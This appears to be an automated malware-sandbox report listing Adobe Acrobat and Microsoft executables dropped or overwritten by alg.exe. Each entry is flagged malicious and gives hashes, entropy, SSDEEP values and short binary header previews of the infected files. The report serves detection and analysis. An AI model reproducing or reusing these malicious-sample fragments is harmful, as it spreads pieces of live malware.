                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........ ..N...N...N......N.e.K...N...O...N...J...N...M...N...H...N...K...N...#...N.<~3...N..C3...N...O...N...O.O.N...F...N.......N......N...L...N.Rich..N.................PE..d...%..c.........."......j...t......@..........@....................................0..... .................................................x........... ....p..dt......................p.......................(... ...8............................................text...kh.......j.................. ..`.rdata...............n..............@..@.data...`S.......F..................@....pdata..dt...p...v...D..............@..@.rsrc... ...........................@..@.reloc..............................@...........................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):3110912
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.648201398679988
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:IU198PzqkltcT0gViJNfBZQiOIK5Ns6YZ82PTJeYhLNiXicJFFRGNzj3:52NfHOIK5Ns6qR9b7wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:C27E558CF2DAA911394C71231104D703
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:06F707DB5FC3625445DB522B5852364EA6AA2A53
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:6E6DDE1D703508AA48911FBAF5D0950E848ABC2CBCFA8B8057DABE440FEF1721
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:8A307EA32C3CA76103D762FCAB5494F8CF8DFC0EC7B74592CAB23B3D491ED0DBC824CF42AF612F08648FF716CC6580E8F6C7F3F5AD62F4D7E5C863597AB270EB
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......'A3rc ]!c ]!c ]!..!h ]!..!. ]!..!x ]!1UY r ]!1U^ i ]!.O.!a ]!..!g ]!..!b ]!1UX . ]!..!@ ]!.UX . ]!c \!.!]!.UT . ]!.U.!b ]!c .!b ]!.U_ b ]!Richc ]!................PE..d.....Zd..........".................t..........@..............................0.....-40... ..................................................o .......&......$.`....................x..p....................y..(....)..8....................j .@....................text............................... ..`.rdata..8...........................@..@.data....q.... ..<...r .............@....pdata..`.....$.......#.............@..@_RDATA........&.......%.............@..@.rsrc........&.......%.............@..@.reloc...@....&..0...H&.............@...................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1743872
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.139931760852899
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:SkDWTUQcyd5/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:SqKUqLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:A3A91680D8A8A553BABB682C01C906A1
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:891991A773A04BFF26169A5ED7BF2F3F9D042FA8
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:0187A57C949615ACBC467D19025609611BF0D63FBB5814A12D14921C6F489BB2
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:825F445C50F7ED134B6E0AD8C170FB2BDFF4BB170AE6F295822C0ED775FB8FA4205083F95F0B3B3E038CBE77EDDFD2DA7B74BB13DC573AA454F38E1C145B3C4D
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0I..Q'..Q'..Q'..7#..Q'..7$..Q'..7".!Q'..$#..Q'..$$..Q'..7&..Q'..$"..Q'.x$"..Q'..Q&.dQ'.x$...Q'.x$...Q'..Q...Q'.x$%..Q'.Rich.Q'.........................PE..d.....Zd.........."......,..........(?.........@..............................%.......... .................................................(...P................m..................tC..p...........................p...8............@..........@....................text....+.......,.................. ..`.rdata......@.......0..............@..@.data....)..........................@....pdata...m.......n..................@..@_RDATA...............B..............@..@.rsrc................D..............@..@.reloc...p...@......................@...................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1494016
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.9009993371195995
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:YI+qBy/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:9+1LNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:9B7055E5F5D5F9FE3DB2B8633997557C
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:A30A1F8BC9D8A20579B554CBF31DF41B75D1180D
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:476584B64D9C2ACE148C81C49EA25827F92413155E60CB09EBF1486BFFAC15E7
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:EDF361D857A2C0B7157079754AC55617B057A1AB9247257D478163F61B7FB67691F146D3C1DFBF3884C801139291A72BBA67987FF4449E4389E90B4B7E640659
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..*...y...y...y...y...y..x...y..x...y..x...y..x-..y..Ey...yb.x...y...y..yN.x...yN.}y...yN.x...yRich...y........PE..L...<..[................. ...................0....@...........................!.....$...............................................0...............................J..p....................K.......J..@............0...............................text... ........ .................. ..`.rdata.......0.......$..............@..@.data....E.......B..................@....rsrc........0......................@..@.reloc.......@......................@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1298944
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.52580882589904
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:FiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:J/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                                                                                                                                                                                                                                        MD5:9DA143A7F1B03B8CE97D0A4BD378E417
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:D9B7B759642B83E289DA5610BD7C103A3172DD88
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:BF29DBDEEF37E4B7386E7212B4F464D2BABAE1BB6E7B1F318DB04857C27DED94
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:100690D29871AAD5CBAAB7ED60C8AD592924F2267759845D31D3926996A88ED8868AF961103BCDF30E836CC306139F05F7681F91A55BB1BD8D26152E74CE8C57
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................+.............................................................G.............Rich............................PE..d...~^.c.........."..........$......p..........@....................................{..... ..................................................;.......p.......`......................d4..p............................4..8............0..0............................text...|........................... ..`.rdata.......0......................@..@.data........P.......,..............@....pdata.......`......................@..@.rsrc........p.......0..............@..@.reloc...`...........2..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1317376
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.555405151327708
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:8EiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:f/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                                                                                                                                                                                                                                        MD5:A38CCBCB76982C1A811551F530DD3747
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:3A5AF36D2B2BE0CA9C22D888F42EE79C943CFE34
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:AD97E01523AFB5C7A4000AB6F256AFDEC93066D932BEC99F4E74192CFBD216CF
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:EAB9FD9EA9AA188DF0AEFA1CBD2F76857AFB676A4792857CC43F27955A1A26E88D9D2B46072F9587A9AD6201852CDAC08EC12634C34602E3514F98595A5FF80F
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2\.v=..v=..v=...E?.x=..I..|=..I..u=..I..j=..I..p=..bV..q=..v=...=..I..t=..IS.w=..v=;.w=..I..w=..Richv=..........................PE..d....^.c.........."......<...B.......>.........@.......................................... ..................................................i..........P.......,...................`X..T............................X..8............P...............................text....;.......<.................. ..`.rdata..$'...P...(...@..............@..@.data................h..............@....pdata..,............l..............@..@.rsrc...P............r..............@..@.reloc...`...........z..............@...........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):4151808
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.4977792338315545
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:AtuUC0nNc/RcYHCY9AWWnURqdHIEogMAYrukdUmSC+bXMZQU1QqpN7553LNiXico:AjEIa4HIEWOc5B7wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:CB6E68F0022DE25C5E751444154B88A8
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:FEE65260B36872F29955B95CB230AE43FD663618
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:8D9C223855810CF13548BAA3A37B1900EABC20A4F0BB88EC4DFF5579F050B57B
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:D1BE3AECB32C8F3178D5611B36DCBA6A64BEA7A80FEA39B7D999B1FB75424ECB2E6F47C8345650EE6DBBF359D8AA5145680F5F41B7F0A1CA6E4CD6485B0B7C59
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........x...............r.......r.......r.......v$.....>m......>m......>m.......r...............r..............<m......<m......<m&.......N.....<m......Rich............................PE..d...<..d.........."......:....................@............................. @.....m.?... .........................................0.%.......%......0)......p'.......................!.T.....................!.(....s .8............P......l.%......................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data....D... &.......&.............@....pdata.......p'.......&.............@..@.didat........).......(.............@..._RDATA....... ).......(.............@..@.rsrc........0).......(.............@..@.reloc...@....6..0...*6.............@...................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):59941376
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.999360372030658
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:1572864:hQb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:SXhwMhe6AABPiQwF6xQ22R
                                                                                                                                                                                                                                                                                                                                                                                        MD5:5311338095EF1A3E1F9CEF5F8D066F8B
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:002527BCFC97EF6206121FB60FFEBA666C444899
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:A3B1DDFD3C13D5CF875FFBB3D34D4E6223CB2F48D8D98E46FBA320DAD033FF56
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:5572D766D1CA69A839EDDAFACCD6A22C7513AF8D53888F139010F02B28B82BDB428775341DB47812A6A383779134E31AE0097DBFB248E7A0CECF94E9A921202D
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;......J...J...Jk.Kt..Jk.Kl..Jk.K..J..Kn..J..Ku..J..K+..Jk.Kt..J...J..J..Kf..J..Kt..J..@J~..J..(J}..J..K~..JRich...J................PE..d...z..d..........".................3.........@.............................0......+..... .....................................................x....`.........06..................8%..T....................&..(...Pg..8............ ......@...@....................text............................... ..`.rdata...}... ...~..................@..@.data...TS..........................@....pdata..06.......8..................@..@.didat..x....@......................@..._RDATA.......P......................@..@.rsrc.......`.....................@..@.reloc.......@.....................@...................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1385984
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.7088011283767
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:djkYzG/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:1/zGLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:E7E9851FCC0464229D12DC03DE75D7EB
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:4DF84A5033088AD1764CDCE98D3F58827C254AE7
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:1CDDC5A1CAD8197237451FEE891B87B55FD6E38ABCD9DCFC3908A55295F008C7
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:57E76618FEA04F014DFBFB753AE84DD427D1F57ACE104625CFBC897AC52DC4829A59F0EA9720A3C29324EE043A067C6EACF639DAA49F2C8088E7F2A2E82CCFEC
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................b....6......6......6.....6.....................M..4......4......4........f....4.....Rich...........................PE..L.....{d.................&...`...............@....@.......................... .............................................r..,................................... O..p....................P.......O..@............@..4............................text....%.......&.................. ..`.rdata...@...@...B...*..............@..@.data................l..............@....rsrc................p..............@..@.reloc...p...........v..............@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1540608
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.938624444362474
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:3xwSJikrmZs6/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:3ylkrKs6LNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:B4633C298516CC5DE80BA9BD51795A13
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:3D1656035AC8438FEABE0C65B0A5D0E9B85BABDA
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:9905024E54E9DF849EF654C14ACD2EB1B6EC701A255E5D557D4F873208CEA242
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:CC9582DC0372C9A63DA1AAEDA69919CB55B896A82889074962C5F0B2B42530A1F5021515461DE95965C0823ED13371F024F159D46C8C9DD14C18AD8FD66BBE65
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................y...5.......5.....5......7.......................7.....7.Z....2...7.....Rich..........................PE..d.....{d.........."..........<.......&.........@..............................".......... .................................................`...x.... ..............................`j..p....................l..(....j..8............................................text...l........................... ..`.rdata..............................@..@.data...4#..........................@....pdata........... ..................@..@_RDATA..............................@..@.rsrc........ ......................@..@.reloc...`...0......................@...................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1804800
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.250429797879778
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:3HQJLIRIvsnNz/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:3HQJLP4zLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:F63CF00D02B62F32B2BF80277F225F51
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:7BDF7B7FFD68200CB71596BB00917DA6090AB1A3
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:813606C508C61FC47A7EF1DCA057B58B65910B6DCB3C107E8A88E80982A74269
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:43E4FBC9FBA54C86A4AEBC164FED771E233ADD8D17F1FE88763F815FC4E07F7FED36247B586A311F1ACE85F9C73FF98F49255599730E9E09379B3C4311A1F3FD
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L<."o."o."o...o.."o+.&n.."o+.!n.."o+.#n."o+.'n."o..$n."o..#n.."o).+n.."o.#o;."o).'n."o)..o."o). n."oRich."o........PE..d......d.........."......\.....................@..............................&.....}-.... .................................................."..@....0...........W..................x...T.......................(...`...8............p..........`....................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data....^...P...R...2..............@....pdata...W.......X..................@..@.didat..8...........................@....msvcjmc..... ......................@....rsrc........0......................@..@.reloc...`...@......................@...................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):5365760
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.448974740068734
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:+UZujDjDjDjXmXgoz2PsapFQrC7dRpqbeE8U2IzwDt+bdro4O8b8ITDnlggyJ1kn:BWmXL6DEC7dRpKuDQbg07wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:D07671E49A07665464CFC34933C0F03D
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:4360A9A58E9BAB8BD6DAC0E0286A001886B3BBD0
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:1E093B3B60D9D171F73FEB4EC248985C0CA8D21287041BA82DA06CF4CA541BD1
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:DE50BE71F9C4601DC1C6A00A3DB934C1AB02A77BF74C22D1411F1842CBB2AD9A2EF46F3170477BA45C5A04B76AAB1378344D65E3BFF209E0AF5EDEBBBD636071
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........I.~.(g-.(g-.(g-.Cd,.(g-.Cb,i(g-.G.-.(g-b\c,.(g-b\d,.(g-.t.-.(g-.(g-C(g-b\b,.(g-.Cc,.(g-.Ca,.(g-.Cf,.(g-.(f-.+g-`\b,.(g-`\g,.(g-`\.-.(g-.(.-.(g-`\e,.(g-Rich.(g-........PE..L......d.........."......./..p......P"%.......0...@...........................R.....7.R..............................@:......@:.......;..V...........................^6.T...................._6.....h.5.@.............0...... :.`....................text...*./......./................. ..`.rdata..Ze....0..f....0.............@..@.data....E....:......h:.............@....didat........;......B;.............@....rsrc....V....;..X...H;.............@..@.reloc...P...@G..@....F.............@...........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):3163136
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.971961764807433
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:98304:drZ23AbsK6Ro022JjL2WEiVqJZX7wRGpj3:RJADmmxL2WEoCZLF9
                                                                                                                                                                                                                                                                                                                                                                                        MD5:F7C67DDF57251B55B2343B16C1B5F2BD
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:12F65F178E4D5E1898E0A20DB3F46267AFD0334F
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:C47BA3993360F5035F833F72D9904430DAF7F95E347802B85A62AB7FFDA20BBD
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:B537487860B2BF7FC6FE8AC5D6FD2027C0550ABDC00B09D49D48146FCF7927B16F7B4D44C268C124FF8A33B9BB60ACB44914E0FDF9D55EDB6087EE20EC170C16
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5{.!q..rq..rq..rq..r...rQc.r`..rQc.r`..rQc.rp..rQc.rp..rRichq..r........................PE..L.....A.................~... .......^... ........... ........................1.....w*1.......... .....................................0............................!............................................... ...............................text....|... ...~.................. ..`.data...............................@....rsrc...../......./.................@...................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1213440
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.197655806987129
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:5frYY42wd7hlOw9fpkEE64K/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:kz9xrSKLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:5B3299682BC5F894F39E10E4226252FD
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:3D2046F1439C0389929858C913E37D48AD56FAB6
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:63A8DFA6BF214D2AE0817EBA7C8EA9A9D3F3C63B0119784385CE8ED87E5DDBDF
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:0AFED02815E8F0B597950D17AD1D78C634453FDAAC3AE814D45DC6B9C497BD29EE99B78D097D665B2B6D3BCC9832CAA31381C8BE7830EEF257D9472C106786CC
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@......T...T...T...U...T...U...T..U...T..U...T...U...T..U...T...U...T...Tf..T..U...T..T...T..uT...T..U...TRich...T................PE..d.....{d..........#......J...........3.........@............................. ............ ..................................................L.......`..........(J..................p...T.......................(... B..8............`.......I..`....................text....H.......J.................. ..`.rdata..d....`.......N..............@..@.data...(w...p...&...^..............@....pdata..(J.......L..................@..@.didat.......@......................@..._RDATA.......P......................@..@.rsrc........`......................@...................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1544192
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.839823852855409
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:3zNKUc5B/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:3zNrc5BLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:B4BBB721A38E9191AFB1C07206A2AEEB
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:36BCE8AC0DDA7A939E2136F45DB8C613C5CA9AFA
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:5FB2ED1699C42FBAB008E698EA7F1F185E440EF3BDB12D85FA709B59BA26633F
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:A3BCF6195753F84EE61BAD27E062569506BD5CCCE71D981673B1500CF945EF8697C29D885D3B41A85F8C0A6D48383666B3AF261CFD5243A4E5C5B37787EE1998
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
